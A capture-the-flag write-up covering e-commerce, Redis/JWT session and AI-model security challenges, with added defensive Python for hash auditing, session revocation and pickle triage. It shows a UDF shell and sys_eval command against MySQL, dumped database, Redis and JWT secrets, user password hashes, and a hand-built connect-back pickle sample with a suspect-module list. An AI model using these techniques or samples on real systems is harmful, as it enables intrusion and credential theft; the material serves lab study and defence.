Preface
The laziest round yet
Asset Security Assessment
1
The company has just launched a merchant-side e-commerce information publishing platform. During security testing, the administrator's security assessment found that it may contain security vulnerabilities. Contestants: download the attachment provided by the platform, analyse the www.zip source code in it, try to obtain backend access, and submit the flag found in the backend.
20191204-124036-1.sql
INSERT INTO `ob_member` VALUES ('1', '0', 'admin', 'admin', '09d5dde58d419119571be42244e84a39', '3162875@qq.com', '0rrt5r2eg00tdut5fd18fk8sa5', '18555550710', '1575434387', '1575434378', '1', '0', '0', '1');
Got the hashed password 09d5dde58d419119571be42244e84a39
Let's look at the hashing method
function data_md5($str, $key = 'OneBase')
{
    // $key is a single application-wide constant, not a per-user salt
    return '' === $str ? '' : md5(sha1($str) . $key);
}
Hmm, can't crack this one either
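Two things about that helper matter from the defender's side: `OneBase` is one constant shared by every account, so it works as a pepper rather than a per-user salt (every account with the same password gets the same stored hash), and because the source ships with the site (www.zip here), the constant is not secret, so md5(sha1(x).key) is just a fast, unsalted hash. The Python below is an added example, not OneBase's own code: a port of `data_md5()` used only to show the shared-hash property, next to the shape of the fix (random per-user salt plus a slow KDF, which is what PHP's `password_hash()` gives you). The sample accounts are constructed.

```python
import hashlib
import hmac
import os

# Port of OneBase's data_md5() for analysis (added example, not the project's code).
# ONEBASE_KEY matches the PHP default argument.
ONEBASE_KEY = "OneBase"


def data_md5(password: str, key: str = ONEBASE_KEY) -> str:
    """Mirror of the PHP helper: empty input stays empty, otherwise md5(sha1(pw) . key)."""
    if password == "":
        return ""
    inner = hashlib.sha1(password.encode()).hexdigest()  # PHP sha1() returns lowercase hex
    return hashlib.md5((inner + key).encode()).hexdigest()


def shared_hashes(accounts: dict) -> dict:
    """Group usernames by stored hash. With one application-wide key there is no per-user
    salt, so every account that uses the same password shares a single hash value."""
    groups = {}
    for user, pw in accounts.items():
        groups.setdefault(data_md5(pw), []).append(user)
    return {h: users for h, users in groups.items() if len(users) > 1}


# Hardened replacement: 16 random bytes of salt per record and a deliberately slow KDF.
# Stored record format (chosen for this example): "salt_hex$derived_key_hex".
PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"{salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    salt_hex, dk_hex = record.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


if __name__ == "__main__":
    # Constructed sample accounts, not the platform's data.
    accounts = {"admin": "Summer2024", "ops": "Summer2024", "dev": "correct horse"}
    print(shared_hashes(accounts))  # admin and ops end up with the identical stored hash
    rec_a, rec_b = hash_password("Summer2024"), hash_password("Summer2024")
    print(rec_a != rec_b, verify_password("Summer2024", rec_a))  # salted: different records, both verify
```

`shared_hashes()` is the audit a reviewer would run over a dump: any collision group means one cracked password unlocks several accounts. The PBKDF2 variant makes that grouping impossible and makes each guess cost 200k iterations instead of one md5.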
2
During further security testing, the administrator found that the e-commerce information publishing platform may contain security vulnerabilities. Contestants: download the attachment provided by the platform, analyse the www.zip source code in it, try to obtain access to the site, then obtain the flag on the server and submit it.
Data Deletion and Recovery
1
The administrator used an AI model to build a transaction data query system that combines Redis and MySQL, but did not adequately verify the security of the code. As a result, a user who has been deleted from MySQL can still log in to the system using the JWT information kept in Redis. Contestants: download the attachment provided by the platform (用户表.xlsx, the user table). Using the user table (one of its users is an administrator test account that can manage the database) together with the users present in the database, determine which users can still log in with a JWT after being deleted. Order the usernames as they appear in the user table, join them with "_", md5 the result and submit it.
Taking the long way round
Because someone had an extra newline when computing the md5, I went into the backend to verify it myself (
Tried the accounts in the given xlsx one by one; zhangzehua could log in normally and is an admin account
The database credentials were also zhangzehua:zhangzehua@cimer..
Once in the database, wrote a shell via UDF
Read index.php
<?php
ob_start(); // start output buffering
require_once 'vendor/autoload.php';
use Firebase\JWT\JWT;
use Firebase\JWT\Key;
const JWT_KEY = '12345678901234567898765456789098';
const JWT_ALGO = 'HS256';
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASS', 'roottoor@cimer2025');
define('DB_NAME', 'new');
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $error = '';
    $redis = new Redis();
    $mysqli = new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
    try {
        // connect to Redis
        if (!$redis->connect('127.0.0.1', 6379)) {
            throw new Exception('Redis连接失败');
        }
        $redis->auth('root@root!cimer');
        $username = trim($_POST['username'] ?? '');
        $password = trim($_POST['password'] ?? '');
        $payload = [
            'sub' => $username,
            'pwd' => $password,
            'iat' => 1743299964, // fixed iat and no exp: the token for a credential pair never changes
        ];
        $jwt = JWT::encode($payload, JWT_KEY, JWT_ALGO);
        // Redis is consulted before MySQL, so a cached token outlives the user's row
        if ($redis->exists("jwt:{$jwt}")) {
            setcookie('token', $jwt, time() + 7200, '/', '', false, true); // httponly=true
            header('Location: welcome.php');
            exit();
        }
        // database check
        $stmt = $mysqli->prepare("SELECT password FROM users WHERE username = ?");
        $stmt->bind_param('s', $username);
        $stmt->execute();
        $stmt->bind_result($storedEncryptedPassword);
        $stmt->fetch();
        if ($storedEncryptedPassword === $password) {
            $redis->set("jwt:{$jwt}", 'valid'); // stored without a TTL
            setcookie('token', $jwt, time() + 7200, '/', '', false, true);
            header('Location: welcome.php');
            exit();
        } else {
            $error = '账号或密码错误';
        }
    } catch (Exception $e) {
        $error = '系统错误:' . $e->getMessage();
    } finally {
        $redis->close();
        $mysqli->close();
        ob_end_flush(); // end output buffering
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>交易数据查询系统</title>
    <style>
        .login-box { width: 300px; margin: 100px auto; padding: 20px; border: 1px solid #ccc; }
        .form-group { margin-bottom: 15px; }
        input { width: 100%; padding: 8px; margin-top: 5px; }
        button { width: 100%; padding: 10px; background: #007bff; color: white; border: none; }
    </style>
    <script src="des.js"></script>
    <script>
        function encryptPassword() {
            const username = document.querySelector('input[name="username"]').value;
            const password = document.querySelector('input[name="password"]').value;
            if (!username || !password) {
                alert("用户名和密码不能为空");
                return false;
            }
            const secretKey1 = "ThisIsAComplexKey123!";
            const secretKey2 = "AnotherSecretKey456_";
            const secretKey3 = "AndYetAnotherKey!@#";
            const encryptedPassword = strEnc(password, secretKey1, secretKey2, secretKey3);
            document.querySelector('input[name="password"]').value = encryptedPassword;
            return true;
        }
        window.onload = function() {
            const form = document.querySelector('form');
            if (form) {
                form.addEventListener('submit', function(event) {
                    if (!encryptPassword()) {
                        event.preventDefault();
                    }
                });
            }
        };
    </script>
</head>
<body>
    <div class="login-box">
        <h2>商家登录</h2>
        <form method="POST">
            <div class="form-group">
                <label>用户名:</label>
                <input type="text" name="username" required>
            </div>
            <div class="form-group">
                <label>密码:</label>
                <input type="password" name="password" required>
            </div>
            <button type="submit">登录</button>
        </form>
    </div>
</body>
</html>
Got the MySQL credentials root:roottoor@cimer2025
Redis password root@root!cimer
Dump the users table
INSERT INTO `users` (`id`, `username`, `password`, `inf`, `is_admin`) VALUES
(1, 'chenxin', 'A47CDC5B7829175B88D87C6F64A9DE6FCD0F7683FD25B231D770F28CEAAB3B92', '成交量: 326次, 交易额: 23800元, 推流: 192次, 浏览: 7320次', 0),
(2, 'wuwen', '46E99CDCA9EC4EBB1740A088B2AF3924A50CF3CFC943544F', '成交量: 158次, 交易额: 42900元, 推流: 76次, 浏览: 5840次', 0),
(3, 'wanghua', '455423198CBA49DE546C1368AC7880728BE72A3825CDCC92ADA9BB8029DADA67', '成交量: 745次, 交易额: 15700元, 推流: 245次, 浏览: 8930次', 0),
(4, 'jinguizhi', 'EC943EBE2AA04024EC55BAEAB382673160EFBA0BAFB4A19E1A588164FD404001', '成交量: 482次, 交易额: 36800元, 推流: 163次, 浏览: 4320次', 0),
(5, 'guoxiaohong', 'B4CE7F02EE2A0CE94F0C2160D3CD8D73FF8DD8E3C2D2C11E8F44C616838A0DD1', '成交量: 893次, 交易额: 41200元, 推流: 278次, 浏览: 9650次', 0),
(6, 'huangzhiqiang', '5FE0DE44C3BE01588C7E39B2162852204C8168FF766674650DF3B303251B3C7D9A8AD3B177765506', '成交量: 234次, 交易额: 28700元, 推流: 94次, 浏览: 3290次', 0),
(7, 'zhangzehua', 'C412816124FADCADDD129E1A497EF7BA00D2F6A8FAD969F2D770F28CEAAB3B92696A1D2DEB1F07A9', '成交量: 671次, 交易额: 45300元, 推流: 201次, 浏览: 7580次', 1),
(8, 'zhangxiuyun', 'DE66703718E5B876C412816124FADCAD83325BEE0035E4EB66D7EE49889FDA58', '成交量: 409次, 交易额: 19600元, 推流: 132次, 浏览: 6210次', 0),
(9, 'wangming', 'A247BCD055B3AAB8EF93194C49755EEEF8393636FA0EB3A0', '成交量: 567次, 交易额: 37400元, 推流: 287次, 浏览: 8340次', 0),
(10, 'wangyan', '7F7455AEB8A3D5F3CAFB30434AF3DC03BC3293D7F1B0CD52', '成交量: 295次, 交易额: 42800元, 推流: 115次, 浏览: 4970次', 0);
Query Redis
select sys_eval('echo "AUTH root@root!cimer\nKEYS *" | redis-cli -h localhost -p 6379')
Got the JWTs
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuaW5neGl1cm9uZyIsInB3ZCI6IkM0MzIwMjQwQ0Y0OTMwNkI2RkY4NjA3Qzk2ODBCRUIxMzMzNkM2QzFDNjMxRUIxMTQ1MEQzNjQyQjhBM0M5NTMiLCJpYXQiOjE3NDMyOTk5NjR9.l112ZTii6Ru7FvAEoS8XsUGrN-R5M8QpKpu48hTaH-4
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJndW94aWFvaG9uZyIsInB3ZCI6IkI0Q0U3RjAyRUUyQTBDRTk0RjBDMjE2MEQzQ0Q4RDczRkY4REQ4RTNDMkQyQzExRThGNDRDNjE2ODM4QTBERDEiLCJpYXQiOjE3NDMyOTk5NjR9.dOepLP5taYHRq7ZsNeUDp5cTJqUPGFtmsDgPLpm8KN0
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJnYW50aW5ndGluZyIsInB3ZCI6IkM3NEM0QTQ0RERDQTIzNkFFMjYyOUZDMTlGNTc1MzgwQjAwMzU2MDM3QzQ3NTI4MjNGRDA5NENBM0Y4RUYzREYiLCJpYXQiOjE3NDMyOTk5NjR9.zLWkcPsjJLten17T6ldMB_rIDCxIV5hvWIPT6JJyAb0
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5nZ3VpemhpIiwicHdkIjoiNDZFOTlDRENBOUVDNEVCQjBCODk0OTRCQTcwNEU4RjM0NTU0MjMxOThDQkE0OURFMEFDNTA0MDY3MDM1MDMzNEMwNDY1N0VCMzBGMEMzRDYiLCJpYXQiOjE3NDMyOTk5NjR9.SxCXfYtOc-IV4XQxSX5wN0tm0FueM7v-9lLHtQcd3bc
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJtZW5ncGVuZyIsInB3ZCI6IjU1QkMwMDUwNTI1MjlBOEIwMTc2NzI1M0IwMzkxNTE3NzlBOUZDOEQ1MTRCRjFDNzk0QTFCQ0Q2QjIwMDI1MkQyNjJCOEY3NEE2MjE5M0M5IiwiaWF0IjoxNzQzMjk5OTY0fQ.Dpg8rVrj0iAqalojRxPpdzZQeMVa5rpWwjIBmvBAU4c
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ6aGFuZ3plaHVhIiwicHdkIjoiQzQxMjgxNjEyNEZBRENBREREMTI5RTFBNDk3RUY3QkEwMEQyRjZBOEZBRDk2OUYyRDc3MEYyOENFQUFCM0I5MjY5NkExRDJERUIxRjA3QTkiLCJpYXQiOjE3NDMyOTk5NjR9.K_lkgKZ3FEp7VC1ITw8SXykVc-Qd36Af_vJEa-IYKAE
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ6aGFuZ2xpaHVhIiwicHdkIjoiNzU2MkExNTZGREM3QUY5OEM0MTI4MTYxMjRGQURDQURDMDZFRENFRDZDRjY5REUzNzg3NzYyNEFDMjFFQzE3OCIsImlhdCI6MTc0MzI5OTk2NH0.SYl4OpnMD5LQnIdMFnjUUyW0QYOsJbt2usOhVlpoEU8
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5naHVhIiwicHdkIjoiNDU1NDIzMTk4Q0JBNDlERTU0NkMxMzY4QUM3ODgwNzI4QkU3MkEzODI1Q0RDQzkyQURBOUJCODAyOURBREE2NyIsImlhdCI6MTc0MzI5OTk2NH0.P4k8FRXvjsUo0dnXQ1ONN9r1FIKgTKvTWF7GVnpsaBE
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJjaGVueGluIiwicHdkIjoiQTQ3Q0RDNUI3ODI5MTc1Qjg4RDg3QzZGNjRBOURFNkZDRDBGNzY4M0ZEMjVCMjMxRDc3MEYyOENFQUFCM0I5MiIsImlhdCI6MTc0MzI5OTk2NH0.d54549DANdaGFVEc12rch0AqO1qQoeMgP5jj93QfsOc
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3dXdlbiIsInB3ZCI6IjQ2RTk5Q0RDQTlFQzRFQkIxNzQwQTA4OEIyQUYzOTI0QTUwQ0YzQ0ZDOTQzNTQ0RiIsImlhdCI6MTc0MzI5OTk2NH0.xZ5lWpI6MO4O2RhjdfsfLgh9yKDM6DTv9oJK_0ptCls
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ6aGFuZ3hpdXl1biIsInB3ZCI6IkRFNjY3MDM3MThFNUI4NzZDNDEyODE2MTI0RkFEQ0FEODMzMjVCRUUwMDM1RTRFQjY2RDdFRTQ5ODg5RkRBNTgiLCJpYXQiOjE3NDMyOTk5NjR9.bLvnDOkGFw3DvWlvwug-h8ok7AxbOFtYk-WWPewN0SM
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5neWFuIiwicHdkIjoiN0Y3NDU1QUVCOEEzRDVGM0NBRkIzMDQzNEFGM0RDMDNCQzMyOTNEN0YxQjBDRDUyIiwiaWF0IjoxNzQzMjk5OTY0fQ.H3nbOVLdcvq3i7MfJLmBvmPem5ryk6Kdj7JkwGTeC3Q
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ3YW5nbWluZyIsInB3ZCI6IkEyNDdCQ0QwNTVCM0FBQjhFRjkzMTk0QzQ5NzU1RUVFRjgzOTM2MzZGQTBFQjNBMCIsImlhdCI6MTc0MzI5OTk2NH0.hmw1s4c3F9ZDu7b6NJ647R_JhkgGTIdVjL1NGepcJgQ
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJqaW5ndWl6aGkiLCJwd2QiOiJFQzk0M0VCRTJBQTA0MDI0RUM1NUJBRUFCMzgyNjczMTYwRUZCQTBCQUZCNEExOUUxQTU4ODE2NEZENDA0MDAxIiwiaWF0IjoxNzQzMjk5OTY0fQ.6I4NTNRahMyOAAhTk-aSnAP7yuAxCeb8Zll2AMYnkXI
jwt:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJodWFuZ3poaXFpYW5nIiwicHdkIjoiNUZFMERFNDRDM0JFMDE1ODhDN0UzOUIyMTYyODUyMjA0QzgxNjhGRjc2NjY3NDY1MERGM0IzMDMyNTFCM0M3RDlBOEFEM0IxNzc3NjU1MDYiLCJpYXQiOjE3NDMyOTk5NjR9.FnnmCXNe8pdkL3UT9dmVjmlQ_LqwgJ4nwqvsESk9lFM
Decoding the payloads gives
ningxiurong
guoxiaohong
gantingting
wangguizhi
mengpeng
zhangzehua
zhanglihua
wanghua
chenxin
wuwen
zhangxiuyun
wangyan
wangming
jinguizhi
huangzhiqiang
Cross-referencing against the users table gives
wangguizhi_ningxiurong_zhanglihua_mengpeng_gantingting
md5 it and submit: 8429e825242b4e9063862b78da1e46dd
Model Environment Security
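The root cause is visible in index.php: the token is HS256 over `{sub, pwd, iat}` with a hard-coded `iat` and no `exp`, so it is identical on every login; Redis is asked `EXISTS jwt:<token>` before MySQL is consulted; the key is `SET` with no TTL; and nothing that deletes a `users` row touches Redis. A deleted user's cached token is therefore accepted forever. The Python below is an added example, not the challenge's code: it rebuilds the token the same way (with `JWT_KEY` and the fixed `iat` from the dump), decodes and signature-checks cached tokens to list the users who exist in Redis but not in MySQL (the cross-referencing step above, generalised to any key set), and sketches the fix. The Redis keys, MySQL rows and table order are constructed samples; the real `pwd` claim is the des.js output, treated here as an opaque string.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# JWT_KEY and the fixed iat are the values from the dumped index.php. Every Redis key
# and MySQL row below is a constructed sample, not the challenge data.
JWT_KEY = b"12345678901234567898765456789098"
FIXED_IAT = 1743299964


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_jwt(username: str, pwd: str) -> str:
    """Same construction as index.php: HS256 over {sub, pwd, iat} with iat fixed, so the
    token for a given (username, pwd) pair is the same on every login and never expires."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps({"sub": username, "pwd": pwd, "iat": FIXED_IAT},
                                separators=(",", ":")).encode())
    sig = hmac.new(JWT_KEY, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def signature_ok(token: str) -> bool:
    """Recompute the HS256 tag over header.payload and compare in constant time."""
    header, payload, sig = token.split(".")
    expected = hmac.new(JWT_KEY, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(b64url(expected), sig)


def verify_and_decode(token: str) -> dict:
    """index.php never verifies; it only asks Redis whether the exact string exists."""
    if not signature_ok(token):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(token.split(".")[1]))


def orphaned_sessions(redis_keys, mysql_usernames, table_order):
    """Usernames that still own a jwt:<token> key in Redis but have no row in users,
    returned in the order of the supplied user table (the task's ordering rule)."""
    cached = {verify_and_decode(k[len("jwt:"):])["sub"]
              for k in redis_keys if k.startswith("jwt:")}
    live = set(mysql_usernames)
    return [u for u in table_order if u in cached and u not in live]


def answer(orphans) -> str:
    """Submission format: names joined with '_', then md5 (no trailing newline)."""
    return hashlib.md5("_".join(orphans).encode()).hexdigest()


class HardenedSessions:
    """Fix sketch: MySQL is checked first and is the source of truth, the session id is
    random rather than derived from the credentials, every entry carries a TTL (Redis
    SETEX), and deleting a user revokes that user's sessions in the same step."""

    def __init__(self, ttl_seconds: int = 7200):
        self.store = {}  # session_id -> (username, expires_at); stands in for Redis
        self.ttl = ttl_seconds

    def login(self, username, pwd, users):
        if users.get(username) != pwd:
            return None
        sid = secrets.token_urlsafe(32)
        self.store[sid] = (username, time.time() + self.ttl)
        return sid

    def resolve(self, sid):
        entry = self.store.get(sid)
        if entry is None or entry[1] < time.time():
            self.store.pop(sid, None)
            return None
        return entry[0]

    def delete_user(self, username, users):
        users.pop(username, None)
        for sid, (owner, _) in list(self.store.items()):
            if owner == username:
                del self.store[sid]


if __name__ == "__main__":
    # Constructed sample: three cached tokens, one belonging to a user still present in MySQL.
    keys = ["jwt:" + mint_jwt(u, "opaque-des-blob") for u in ("ningxiurong", "zhangzehua", "wangguizhi")]
    orphans = orphaned_sessions(keys, ["zhangzehua", "chenxin"],
                                ["wangguizhi", "ningxiurong", "zhangzehua", "chenxin"])
    print(orphans, answer(orphans))
```

Run against a real `KEYS jwt:*` listing and a `SELECT username FROM users`, `orphaned_sessions()` is the detection; `HardenedSessions` shows the three changes that remove the class of bug rather than this instance.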
1
To make office work easier with AI, the administrator set up an Ollama framework on the server, but later found that it has security problems. Contestants: perform a security test against the Ollama framework, obtain the username of the user with uid 1000 on the server, and submit it as the answer.
Hit /api/version: version 0.1.33
Feels like the CVE from last year's DAS October round, but I didn't remember the details, gg
2
To meet work requirements, the administrator downloaded a batch of pkl and h5 training-model files from the internet for use. Before any security audit, the administrator named the files "AI_models.zip" and placed them on the file server. Analysis later showed that the archive contains files that perform a malicious connection operation. Contestants: identify the model file that performs the malicious connection, and submit the host IP and port of that connection as the answer.
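No solution is written up for this one, so here is the triage step a defender would apply to the pkl side before anything gets loaded. A pickle is a small program: `GLOBAL` (protocols 0-3) and `STACK_GLOBAL` (protocol 4+) name the functions that `pickle.loads()` will import and `REDUCE` will call, so listing those imports without deserialising tells you whether a "model" reaches for `socket`, `subprocess` or friends. The Python below is an added example, not part of the writeup: it tokenises the opcode stream with `pickletools.genops` (nothing runs), resolves `STACK_GLOBAL` operands through a small string/memo tracker, and flags suspect modules. The samples are constructed; the connect-back one is a hand-written protocol-0 pickle pointing at an RFC 5737 documentation address and is only ever tokenised. The h5 side needs a different check (Keras `Lambda` layers carry serialised code in the model config) and is not covered here.

```python
import pickle
import pickletools
from collections import OrderedDict

# Module names a serialised model has no reason to import, and builtins that mean code
# execution on load. Constructed lists for this example; extend them for your environment.
SUSPECT_MODULES = {"socket", "subprocess", "os", "posix", "nt", "sys", "urllib", "http",
                   "webbrowser", "pty", "ctypes", "importlib", "code"}
SUSPECT_BUILTINS = {"eval", "exec", "compile", "__import__", "open"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE", "BINUNICODE",
              "SHORT_BINUNICODE", "BINUNICODE8"}


def pickle_imports(data: bytes):
    """Every (module, name) the pickle would import on load, found by tokenising the
    opcode stream: nothing is deserialised and nothing is called.
    STACK_GLOBAL takes its two operands from the strings pushed just before it (possibly
    fetched back from the memo), so pushed strings and memo slots are tracked alongside."""
    found, strings, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                       # protocol 0-3: "module\nname\n"
            module, name = arg.split(" ", 1)
            found.append((module, name))
            last = None
        elif op.name in STRING_OPS:
            strings.append(arg)
            last = arg
        elif op.name == "MEMOIZE":                    # memo slot = count of MEMOIZEs so far
            memo[len(memo)] = last
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        elif op.name == "STACK_GLOBAL":               # protocol 4+: module, name were pushed
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
            last = None
        else:
            last = None
    return found


def suspicious_imports(data: bytes):
    """Imports worth a human look: anything under a suspect module, or a dangerous builtin."""
    flagged = []
    for module, name in pickle_imports(data):
        top = module.split(".")[0]
        if top in SUSPECT_MODULES or (top == "builtins" and name in SUSPECT_BUILTINS):
            flagged.append((module, name))
    return flagged


# Constructed samples. BENIGN is a plain weights dict; WITH_CLASS imports a legitimate
# class; CONNECT_BACK is a hand-written protocol-0 pickle whose load would call
# socket.create_connection(("192.0.2.10", 4444)) (documentation address). It is only
# tokenised here, never passed to pickle.loads().
BENIGN = pickle.dumps({"layers": 3, "weights": [0.1, 0.2, 0.3]}, protocol=4)
WITH_CLASS = pickle.dumps(OrderedDict(lr=0.01), protocol=4)
CONNECT_BACK = b"csocket\ncreate_connection\n((S'192.0.2.10'\nI4444\nttR."

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("ordereddict", WITH_CLASS), ("connect-back", CONNECT_BACK)):
        print(label, pickle_imports(blob), "FLAGGED" if suspicious_imports(blob) else "ok")
```

For the challenge's question (which host and port), the operands pushed right after the flagged `GLOBAL` are the arguments that `REDUCE` would pass, so the same `genops` pass that finds the import also shows the address without loading the file. The string/memo tracker is a heuristic that matches what CPython's pickler emits; hand-obfuscated pickles can defeat it, which is why an unknown pickle is loaded in a sandbox or not at all.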
3
According to internal company rules, employees using AI must strictly comply with the requirement not to upload sensitive company information. Such sensitive information may include, but is not limited to: users' personal data, financial statements, employees' personal information, technical plans under development, internal communication records, contracts, trade secrets, marketing strategies, and any other confidential data that could harm the company. The administrator set up a local AI model on the server to help with office work, but broke the company rules in one operation: using the AI to batch-convert the format of images containing users' private information. Contestants: access the file server, obtain the "upload.zip" file, analyse the attachment to recover the uploaded data and count the items of user private data, and submit that count as the answer.